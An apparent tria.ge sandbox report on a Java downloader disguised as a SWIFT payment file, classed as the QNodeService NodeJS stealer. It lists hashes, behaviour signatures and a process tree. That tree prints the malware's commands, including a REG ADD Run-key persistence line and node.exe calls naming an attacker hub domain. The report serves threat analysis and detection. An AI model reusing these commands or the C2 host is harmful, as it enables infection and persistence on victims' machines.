Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
122s -
platform
windows10_x64 -
resource
win10 -
submitted
26/10/2020, 14:50
Static task
static1
Behavioral task
behavioral1
Sample
SWIFT MT103 65800 .jar
Resource
win7
Behavioral task
behavioral2
Sample
SWIFT MT103 65800 .jar
Resource
win10
General
-
Target
SWIFT MT103 65800 .jar
-
Size
74KB
-
MD5
1c42b39fa5ff0b4d50d099a5e24c8d1b
-
SHA1
8cd53e0dad4fb4d14f9c7961e60c4f22950d4dd2
-
SHA256
e0d72ff290c85484632f91a9ae7de44f3b72e0f4c77bded1b2026f51c2d22f97
-
SHA512
3c2bf03e0351dfcc0d683dd698005d2b0e46d7f34dcb179180c3783a0a831c6372e10d8f50b76352d586fbe057fcd82e4b1eaeb73524751175e484f5f358ca54
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 1240 node.exe 3352 node.exe 2672 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\d2a1ce22-cdce-48c4-ae38-31aa0b248d26 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab50-168.dat js behavioral2/files/0x000100000001ab50-171.dat js behavioral2/files/0x000100000001ab50-175.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 39 wtfismyip.com 40 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1240 node.exe 1240 node.exe 1240 node.exe 1240 node.exe 3352 node.exe 3352 node.exe 3352 node.exe 3352 node.exe 2672 node.exe 2672 node.exe 2672 node.exe 2672 node.exe 2672 node.exe 2672 node.exe 2672 node.exe 2672 node.exe 2672 node.exe 2672 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3868 wrote to memory of 2668 3868 java.exe 75 PID 3868 wrote to memory of 2668 3868 java.exe 75 PID 2668 wrote to memory of 1240 2668 javaw.exe 79 PID 2668 wrote to memory of 1240 2668 javaw.exe 79 PID 1240 wrote to memory of 3352 1240 node.exe 81 PID 1240 wrote to memory of 3352 1240 node.exe 81 PID 3352 wrote to memory of 2672 3352 node.exe 82 PID 3352 wrote to memory of 2672 3352 node.exe 82 PID 2672 wrote to memory of 2308 2672 node.exe 84 PID 2672 wrote to memory of 2308 2672 node.exe 84 PID 2308 wrote to memory of 1972 2308 cmd.exe 85 PID 2308 wrote to memory of 1972 2308 cmd.exe 85
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\SWIFT MT103 65800 .jar"1⤵
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\a142b49e.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain acmehydraeulic.ddns.net --hub-domain localhost3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_Azpb9E\boot.js --hub-domain acmehydraeulic.ddns.net --hub-domain localhost4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_Azpb9E\boot.js --hub-domain acmehydraeulic.ddns.net --hub-domain localhost5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "d2a1ce22-cdce-48c4-ae38-31aa0b248d26" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "d2a1ce22-cdce-48c4-ae38-31aa0b248d26" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:1972
-
-
-
-
-
-